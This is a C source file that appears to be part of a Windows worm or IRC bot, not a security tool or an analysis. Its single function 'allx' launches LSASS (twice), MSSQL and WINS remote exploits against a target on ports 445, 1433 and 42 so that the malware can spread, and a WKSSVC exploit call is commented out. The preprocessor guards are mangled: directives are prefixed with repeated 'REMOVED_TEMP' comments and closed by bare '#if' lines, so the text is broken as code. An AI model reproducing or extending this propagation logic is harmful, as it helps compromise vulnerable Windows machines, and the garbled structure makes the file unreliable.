#include "../header/includes.h"
#include "../header/functions.h"
#include "../header/externs.h"

//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#ifndef NO_LSASS
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#ifndef NO_LSASS2
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#ifndef NO_WKSSVC
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#ifndef NO_MSSQL
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#ifndef NO_WINS
BOOL allx(EXINFO exinfo)
{	
	//LSASS + LSASS2
	exinfo.port = 445;
	BOOL bLSASS = Lsass(exinfo);
	exinfo.port = 445;
	BOOL bLSASS2 = lsass2(exinfo);
	
	//WKSSVC_ENG + WKSSVC_OTHER
//	exinfo.port = 445;
//	BOOL bro0t1 = ro0t1(exinfo);

	//MSSQL + WINS
	exinfo.port = 1433;
	BOOL bMSSQL = MSSQL(exinfo);
	exinfo.port = 42;
	BOOL bWINS = Wins(exinfo);

	return bLSASS || bLSASS2 || bMSSQL || bWINS ? TRUE : FALSE;
}
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#if
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#if
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#if
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#if
//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP//REMOVED_TEMP#if

